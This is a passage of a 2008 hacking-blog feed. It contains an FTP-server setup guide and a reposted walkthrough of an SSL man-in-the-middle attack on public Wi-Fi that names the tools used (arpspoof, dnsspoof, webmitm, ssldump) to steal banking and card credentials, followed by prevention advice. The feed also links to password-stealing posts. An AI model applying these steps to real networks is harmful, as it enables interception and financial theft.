http://www.getdemocracy.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.telegossip.org/"&gt;&lt;span&gt;   http://www.telegossip.org&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.my-tv.it/video.jsp?idart=1875"&gt;&lt;span&gt;   http://www.my-tv.it/video.jsp?idart=1875&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.nagoya-bunri.ac.jp/%7Einayoshi/"&gt;&lt;span&gt;   http://www.nagoya-bunri.ac.jp/~inayoshi/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://wwitv.com/portal.htm"&gt;&lt;span&gt;   http://wwitv.com/portal.htm&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://gbstv.info/"&gt;&lt;span&gt;   http://gbstv.info&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.tv.com/"&gt;&lt;span&gt;   http://www.tv.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.jumptv.com/"&gt;&lt;span&gt;   http://www.jumptv.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.beelinetv.com/"&gt;&lt;span&gt;   http://www.beelinetv.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.streamick.com/%20watch%20online"&gt;&lt;span&gt;   http://www.streamick.com/ watch online&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.viidoo.com/en/index.php"&gt;&lt;span&gt;   http://www.viidoo.com/en/index.php&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.channelchooser.com/"&gt;&lt;span&gt;   http://www.channelchooser.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.viidoo.com/en/index.php"&gt;&lt;span&gt;   http://www.viidoo.com/en/index.php&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.wavelit.com/index.asp"&gt;&lt;span&gt;   http://www.wavelit.com/index.asp&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.tetesaclaques.tv/video.php?vi"&gt;&lt;span&gt;   http://www.tetesaclaques.tv/video.php?vi&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.twit.tv/"&gt;&lt;span&gt;   http://www.twit.tv&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.ctv.ca/generic/generated/bpla"&gt;&lt;span&gt;   http://www.ctv.ca/generic/generated/bpla&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://dl.tv/"&gt;&lt;span&gt;   http://dl.tv&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.comingsoon.net/"&gt;&lt;span&gt;   http://www.comingsoon.net/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.mediahopper.com/"&gt;&lt;span&gt;   http://www.mediahopper.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;&lt;a href="http://freedownloaz.blogspot.com/"&gt;Hacking Tv&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/online-tv.html</link><author>noreply@blogger.com (saien)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-8936092464299820235</guid><pubDate>Thu, 21 Feb 2008 14:56:00 +0000</pubDate><atom:updated>2008-02-23T10:15:45.057-08:00</atom:updated><title>Create An Ftp Server On Your Pc</title><description>&lt;p class="MsoNormal"&gt;&lt;span style="font-weight: bold;"&gt;How to create an FTP Server on your computer  &lt;/span&gt;using Ser-u,their is a cool trick for changing ur pc into server.&lt;a href="http://freedownloaz.blogspot.com/2008/02/hack-yahoo-passwords.html"&gt;Hack yahoo password&lt;/a&gt; by making servers &amp;amp; &lt;a href="http://freedownloaz.blogspot.com/2008/02/password-stealer-for-all-messengers.html"&gt;hack any messengers passwords.&lt;/a&gt;&lt;o:p style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;o:p style="font-weight: bold;"&gt;Process 1:&lt;/o:p&gt;&lt;br /&gt;First of all u have to get an static IP-Address.&lt;br /&gt;Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The  main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;      &lt;p class="MsoNormal"&gt;&lt;o:p&gt;1.Goto &lt;a href="http://www.no-ip.com/"&gt;no-ip&lt;/a&gt;&lt;/o:p&gt; &amp;amp; create urself  a free account.&lt;/p&gt;&lt;p class="MsoNormal"&gt;2.Now ur account been created &amp;amp; ll receive ur account password via mail to ur email address.&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;3.After getting ur password login to ur account of no-ip.com&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;4.After getting logged in, click upon add a HOST its on the left menu.&lt;br /&gt;&lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;5.Type any hostname u want (eg:-saien) &amp;amp; select any domain from da given list (eg:-ftpserve.com) Click on Submit.&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;6.Now u have owned ur own static address (example: saien.serveftp.com)&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;7.Now click downloads button which is present above on the page &amp;amp; click on which operating system ur using &amp;amp; den download DNS update client or u can download it from &lt;a href="http://dw.com.com/redir?edId=3&amp;amp;siteId=4&amp;amp;oId=3000-2165_4-10055182&amp;amp;ontId=2165&amp;amp;spi=980fbf299235f152784e2e1cef54020a&amp;amp;lop=link&amp;amp;ltype=dl_dlnow&amp;amp;pid=10055182&amp;amp;mfgId=77301&amp;amp;merId=77301&amp;amp;destUrl=http%3A%2F%2Fwww.download.com%2F3001-2165_4-10375673.html%3Fspi%3D980fbf299235f152784e2e1cef54020a%26part%3Ddl-NoIPDUCDy"&gt;here&lt;/a&gt; directly, this is for microsoft window users..&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;8.After getting downloaded, u have to install this software &amp;amp; login here with ur email addresss &amp;amp; p/w wen asked for it.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;9.At last tick on da check box present at the static address.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;10.U have ur own static web address.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;            &lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Process 2:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;Installation &amp;amp; setting of the FTP-Server &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;1.You have to install Serv-U 4.1.03 , download this software from &lt;a href="http://www.gold-software.com/504.exe"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;2. Run Serv-U &amp;amp; use da wizard to setup ur FTP.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;3.Click on next until u have been asked for IP-Address, leave it as it is &amp;amp; click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;4.Enter ur domain name u have registered (example: rkchoolie.serveftp.com) it above in da domain field &amp;amp; click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;5.U ll be asked for anonymous access,  select  No &amp;amp; click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;6.Next u ll be asked for creating  a named account, select yes &amp;amp; click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;7.Choose any user name  u  wish (eg:-saien)  &amp;amp; clcik upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;8.Enter password for dis account  (eg:-@1254Rwn)  for security purpose  choose  difficult password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;9.U ll be asked for da home directory for the account which u have created  above.Select directory &amp;amp; click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;10.Click on yes for locking dis account  to da home directory, doing dis da user cannot further move up into  home directory, click upon next.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;11.At last ur account has been created click finish.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;        &lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;span style="font-weight: bold;"&gt;Process 3:&lt;/span&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;Configuring the user accounts  which u have been created.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;1.On the left tree-menu, select da account which u have been created above &amp;amp; den click upon General Tab.&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;2.Goto Hide 'Hidden' Files.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;    &lt;p class="MsoNormal"&gt;3. Check Allow only and enter the number one in the box.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;4.Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank  as uers can download with full bandwidth.&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;5.choose how many users u want to login at on time.It depends on ur connection speed   try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;6.Click upon Dir Access Tab.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;7.Now u can c home folder here.Highlight it &amp;amp; make ur permission.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;8.If u want only users to download check only these Read,List &amp;amp; Inherit.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;9.If u  want ur users to upload into ur server &amp;amp; bu tto only 1 particular folder but not to downlaod, click upon dat add button &amp;amp; then select dat folder, Now u have to highlight dat folder  &amp;amp; set these permissions  on  dat folder.Check,Write,Appened,List,Create &amp;amp; Inherit after setting these permissions  click  on the arrow  which is present at  the bottom right-hand corner.U want  dis upload folder 2 be  list first, before da home folder. &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;10.If der is any folder which u dont want anyone to access it, &amp;amp; it is present in the home folder, den click da add button &amp;amp; den select da folder.Now u have to highlight dat folder &amp;amp; see dat no all da checkboxes are left.After doing this click upon upper arrow which is present  at bottom right hand  corner.&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;11.There r many things u can do, These are only the basics....&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;12. Ur server is now ready to be connected..&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;13. Login  with  ur username &amp;amp; password...&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/p&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/create-ftp-server-on-your-pc.html</link><author>noreply@blogger.com (saien)</author><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-8706282681607592433</guid><pubDate>Wed, 20 Feb 2008 16:19:00 +0000</pubDate><atom:updated>2008-02-21T21:54:38.594-08:00</atom:updated><title>Hacking Online Banking and Credit Card Transactions</title><description>&lt;h4 style="font-weight: bold; text-align: justify;"&gt;      Hacking Online Banking and Credit Card Transactions – And How to Prevent It:&lt;/h4&gt;Here is process for hacking online banking and credit cards transactions and also a process to prevent from them .&lt;br /&gt;&lt;h4 style="font-weight: normal; text-align: justify;"&gt;The Scenario&lt;/h4&gt;&lt;div&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; You go to a coffee shop for a cup of coffee and to utilize the shop’s Wi-Fi HotSpot to surf the web. You connect to the hotspot network and decide to perform some online banking or to purchase something online. By the way, this could happen to you at home, as well. As an end-user, you &lt;em&gt;feel&lt;/em&gt; quite secure, as you see the lock in the bottom corner of your Internet browser, symbolizing that the online banking or online credit card transaction is safe from prying eyes. Your data, including username, password, credit card info, etc. will be encrypted with 128-bit encryption. &lt;em&gt;&lt;strong&gt;So it's secure, right?&lt;/strong&gt;&lt;/em&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt;   &lt;script type="text/javascript" src="http://www.spotplex.com/send/743704/no-image.js"&gt; &lt;/script&gt;&lt;a href="http://www.spotplex.com/code/743704" onfocus="blur();" target="_blank"&gt;&lt;img src="http://www.spotplex.com/send/743704/no-image.gif?r=http%3A%2F%2Fwww.ethicalhacker.net%2Fcontent%2Fview%2F25%2F24%2F" border="0" /&gt;&lt;/a&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt; It is not uncommon to perform banking and to purchase products online with your credit card. It is also a common thought that doing so is secure, as this is done via SSL. For the most part, this is true and the sessions are secure. Discover Card, for example, posts the following statement on their website: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/1.jpg" border="0" height="302" width="580" /&gt;&lt;br /&gt;&lt;strong&gt;Figure 1&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The problem is that it is not “virtually impossible” for someone else to see your data, such as login information or credit card numbers. It can actually be relatively easy, as you’ll see, if you as an end-user are not knowledgeable about how you can be exploited and know the signs that this is occurring. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/2.jpg" border="0" height="86" width="187" /&gt;&lt;br /&gt;Figure 2 &lt;/strong&gt;(Indicates a Secure SSL Session)  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Continuing with the scenario, what you didn’t realize is that a hacker has intercepted your Online Banking login credentials and credit card information and can now log into your Online Banking Website or purchase items with your credit card. How is this possible, since SSL was used and is hard to break? The answer is that you made a fatal mistake that subjected you to an SSL Man-in-the-Middle (MITM) attack. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;The Attack&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;Here’s how it’s done:&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The following diagram shows a very simplified graphic of how your SSL Banking session should work under normal conditions, then how it would work during an attack: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/3.gif" border="0" height="301" width="575" /&gt;&lt;br /&gt;Figure 3&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/4.gif" border="0" height="318" width="575" /&gt;&lt;br /&gt;Figure 4&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; An important concept to grasp here is that a certificate is used to establish the secure SSL connection. This is a good thing, if you have a good certificate and are connecting directly to the website to which you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is &lt;em&gt;truly&lt;/em&gt; the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; This is a bad thing if you have a “Fake” certificate being sent from the hacker, and you are actually connecting to his machine, not directly to the bank’s website. In this case, your credentials are being transmitted between your browser and the hacker’s machine. The hacker is able to grab that traffic, and, because he gave you the certificate to encrypt the data/credentials, he can use that same certificate to decrypt your data/credentials. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;Here are the exact steps a hacker could use to perform this attack:&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The first thing he would do is turn on &lt;strong&gt;Fragrouter&lt;/strong&gt;, so that his machine can perform IP forwarding  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/5.jpg" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 5&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; After that, he’ll want to direct your Wi-Fi network traffic to his machine instead of your data traffic going directly to the Internet. This enables him to be the “Man-in-the-Middle” between your machine and the Internet. Using &lt;strong&gt;Arpspoof&lt;/strong&gt;, a real easy way to do this, he determines your IP address is 192.168.1.15 and the Default Gateway of the Wi-Fi network is 192.168.1.1: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/6.jpg" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 6&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The next step is to enable DNS Spoofing via &lt;strong&gt;DNSSpoof&lt;/strong&gt;:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/7.jpg" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 7&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Since he will be replacing the Bank's or Online Store’s valid certificate with his own fake one, he will need to turn on the utility to enable his system to be the Man-in-the-Middle for web sessions and to handle certificates. This is done via &lt;strong&gt;webmitm&lt;/strong&gt;:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/8.jpg" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 8&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; At this point, he is setup and ready to go, he now needs to begin actively sniffing your data passing through his machine including your login information and credit card info. He opts to do this with &lt;strong&gt;Ethereal&lt;/strong&gt;, then saves his capture:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/9.gif" border="0" height="384" width="464" /&gt;&lt;br /&gt;Figure 9&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; He now has the data, but it is still encrypted with 128-bit SSL. No problem, since he has the key. What he simply needs to do now is decrypt the data using the certificate that he gave you. He does this with &lt;strong&gt;SSL Dump&lt;/strong&gt;:  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/10.gif" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 10&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; The data is now decrypted and he runs a Cat command to view the now decrypted SSL information. Note that the username is “Bankusername” and the password is “BankPassword”. Conveniently, this dump also shows that the Banking site as National City. FYI, the better, more secure banking and online store websites will have you first connect to another, preceeding page via SSL, prior to connecting to the page where you enter the sensitive information such as bank login credentials or credit card numbers. The reason for this is to stop the MITM-type attack. How this helps is that if you were to access this preceeding page first with a "fake" certificate and then proceeded to the next page where you were to enter the sensitve information, that page where you would enter the sensitive information would not display. That is because the page gathering the sensitive information would be expecting a valid certificate, which it would not receive because of the Man-in-the-Middle. While some online banks and stores do implement this extra step/page for security reasons, the real flaw in this attack is the uneducated end-user, as you'll soon see: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/11.jpg" border="0" height="398" width="641" /&gt;&lt;br /&gt;Figure 11&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; With this information, he can now log into your Online Banking Account with the same access and privileges as you. He could transfer money, view account data, etc. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; Below is an example of a sniffed SSL credit card purchase/transaction. You can see that Elvis Presley was attempting to make a purchase with his credit card 5440123412341234 with an expiration date of 5/06 and the billing address of Graceland in Memphis, TN (He is alive!). If this was your information, the hacker could easily make online purchases with your card. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/12.jpg" border="0" height="377" width="607" /&gt;&lt;br /&gt;Figure 12&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Also Real Bad News for SSL VPN Admins&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; This type of attack could be particularly bad for corporations. The reason for this is that Corporate SSL VPN solutions are also vulnerable to this type of attack. Corporate SSL VPN solutions will often authenticate against Active Directory, the NT Domain, LDAP or some other centralized credentials data store. Sniffing the SSL VPN login then gives an attacker valid credentials to the corporate network and other systems. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;What an End-User Needs To Know&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; There’s a big step and end-user can take to prevent this from taking place. When the MITM Hacker uses the “bad” certificate instead of the “good”, valid certificate, the end-user is actually alerted to this. The problem is that most end-users don’t understand what this means and will unknowingly agree to use the fake certificate. Below is an example of the Security Alert an end-user would receive. Most uneducated end-users would simply click “Yes”… and this is the fatal flaw: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/13.jpg" border="0" height="300" width="382" /&gt;&lt;br /&gt;Figure 13&lt;/strong&gt;  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; By clicking “Yes”, they have set themselves up to be hacked. By clicking the “View Certificate” button, the end-user would easily see that there is a problem. Below are examples of the various certificate views/tabs that show a good certificate compared to the bad certificate: &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/14.jpg" border="0" height="332" width="576" /&gt;&lt;br /&gt;Figure 14&lt;/strong&gt;&lt;br /&gt;(Good Certificate)                                                (Bad Certificate)  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/15.jpg" border="0" height="339" width="575" /&gt;&lt;br /&gt;Figure 15&lt;/strong&gt;&lt;br /&gt;(Good Certificate)                                                (Bad Certificate)  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; &lt;strong&gt;&lt;img src="http://www.ethicalhacker.net/images/stories/columns/hoffman/feb06/16.jpg" align="middle" border="0" height="336" width="575" /&gt;&lt;br /&gt;Figure 16&lt;/strong&gt;&lt;br /&gt;(Good Certificate)                                                (Bad Certificate)  &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;How an End-User Can Prevent This&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt;  Again, the simple act of viewing the certificate and clicking “No” would have prevented this from happening.   &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; Education is the key for an end-user. If you see this message, take the time to view the certificate. As you can see from the examples above, you can tell when something doesn’t look right. If you can’t tell, err on the side of caution and call your Online Bank or the Online store. &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt;  Take the time to read and understand all security messages you receive. Don’t just randomly click yes out of convenience.   &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;How a Corporation Can Prevent This&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;  &lt;p&gt;  Educate the end-user on the Security Alert and how to react to it.   &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt;  Utilize One Time Passwords, such as RSA Tokens, to prevent the reuse of sniffed credentials.   &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p&gt; When using SSL VPN, utilize mature products with advanced features, such as Juniper’s Secure Application Manager or Network Connect functionality. &lt;/p&gt;  &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;Conclusion&lt;/h4&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt; This type of attack is relatively easy to do in a public Wi-Fi hotspot environment. It could also easily happen on a home Wi-Fi network, if that Wi-Fi network isn’t properly configured and allows a hacker to connect to that home network (See &lt;a href="http://freedownloaz.blogspot.com/2008/02/essential-wireless-hacking-tools.html" class="undefined"&gt;Essential Wireless Hacking Tools&lt;/a&gt; for more info on securing your home network). An educated end-user and sound security practices by corporations can protect your valuable data. &lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;p style="text-align: justify;"&gt;The credit goes to the Ethical Hackers.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;span 